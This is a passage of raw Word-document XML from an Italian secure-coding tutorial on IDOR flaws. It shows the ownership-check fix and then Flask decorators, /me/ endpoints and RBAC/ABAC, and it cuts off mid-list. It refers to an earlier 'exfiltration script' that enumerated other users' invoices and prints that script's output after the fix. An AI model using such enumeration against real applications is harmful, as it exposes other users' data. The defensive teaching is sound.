        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">riga)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La differenza è una sola riga della query:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AND fatture.utente_id = ?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con il parametro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utente_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">preso dalla sessione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riavvia, fai login come Mario, prova di nuovo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/fattura/3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(di Giulia):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">404 Fattura non trovata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La fattura esiste, ma non è di Mario, quindi per Mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non esiste</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lo script di esfiltrazione del </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_6_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">§6.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> ora produce solo le fatture di Mario:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    1 — utente: mario      importo:    3200.00 €</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    2 — utente: mario      importo:     -89.00 €</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Esfiltrazione completata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai chiuso l’IDOR.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="272" w:name="la-regola-doro"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La regola d’oro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Per ogni endpoint che riceve un identificatore di risorsa, prima di leggere/modificare/cancellare la risorsa, verifica nel codice server-side che l’utente corrente sia autorizzato ad accedere proprio a quella risorsa specifica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sembra ovvia, ma — come testimonia OWASP da otto anni — è la cosa che si dimentica più spesso. Le strategie per non dimenticarla:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="272"/>
    <w:bookmarkStart w:id="273" w:name="filtro-nella-query-stessa-come-sopra"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Filtro nella query stessa (come sopra)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’autorizzazione è incorporata nel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della query: la riga è restituita solo se appartiene all’utente. Se non appartiene, il database restituisce zero righe e il codice dell’applicazione restituisce 404.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vantaggi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una sola operazione invece di due (leggere + verificare). Atomico. Difficile dimenticarsi.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Svantaggi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non sempre applicabile (es. quando vuoi distinguere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non esiste</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esiste ma non sei autorizzato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="273"/>
    <w:bookmarkStart w:id="274" w:name="controllo-esplicito-dopo-la-lettura"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Controllo esplicito dopo la lettura</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fattura </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> leggi_fattura_per_id(fattura_id)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fattura:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fattura.utente_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostra_fattura(fattura)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Più verboso, ma più esplicito e permette di distinguere 404 da 403.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="274"/>
    <w:bookmarkStart w:id="275" w:name="decoratore-di-autorizzazione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Decoratore di autorizzazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Flask si può creare un decoratore riutilizzabile:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> functools </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wraps</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> proprietario_richiesto(modello):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""Decoratore che verifica che l'utente sia proprietario della risorsa."""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> decorator(func):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@wraps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(func)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper(</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risorsa_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> kwargs.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fattura_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># da generalizzare</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            risorsa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> leggi(modello, risorsa_id)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risorsa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> risorsa.utente_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            kwargs[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"risorsa"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> risorsa</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</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ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> decorator</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/fattura/&lt;int:fattura_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@proprietario_richiesto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fattura"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fattura(fattura_id, risorsa):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostra_fattura(risorsa)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vantaggio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">centralizza la logica, riusabile su ogni endpoint.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Svantaggio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una volta scritto male, è sbagliato dappertutto. Va testato bene.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="275"/>
    <w:bookmarkStart w:id="276" w:name="riferimenti-indiretti-lendpoint-me..."/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Riferimenti indiretti: l’endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/me/...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un design alternativo, molto pulito quando applicabile: invece di esporre l’ID nell’URL, usare un riferimento implicito basato sulla sessione:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/me/fatture           → tutte le mie fatture (l'utente è dedotto dalla sessione)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/me/fatture/2         → la mia fattura numero 2 (relativa a me)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Niente ID dell’utente nell’URL = niente IDOR per l’ID utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(può ancora esserci sull’ID interno della fattura, vanno entrambi controllati).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="276"/>
    <w:bookmarkStart w:id="277" w:name="X0cd4fd4668d90bf8d7bdbf7ab0767d8a6e6754d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Liste di controllo accessi più strutturate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per applicazioni complesse con molti tipi di utente e permessi granulari, esistono framework dedicati:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RBAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Role-Based Access Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): ogni utente ha uno o più</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ruoli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ogni ruolo ha permessi predefiniti. Es.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">editor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cliente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ABAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Attribute-Based Access Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): le decisioni di accesso si basano su attributi dell’utente, della risorsa e del contesto. Es.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">un utente del reparto vendite può vedere fatture del proprio reparto solo durante l’orario lavorativo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
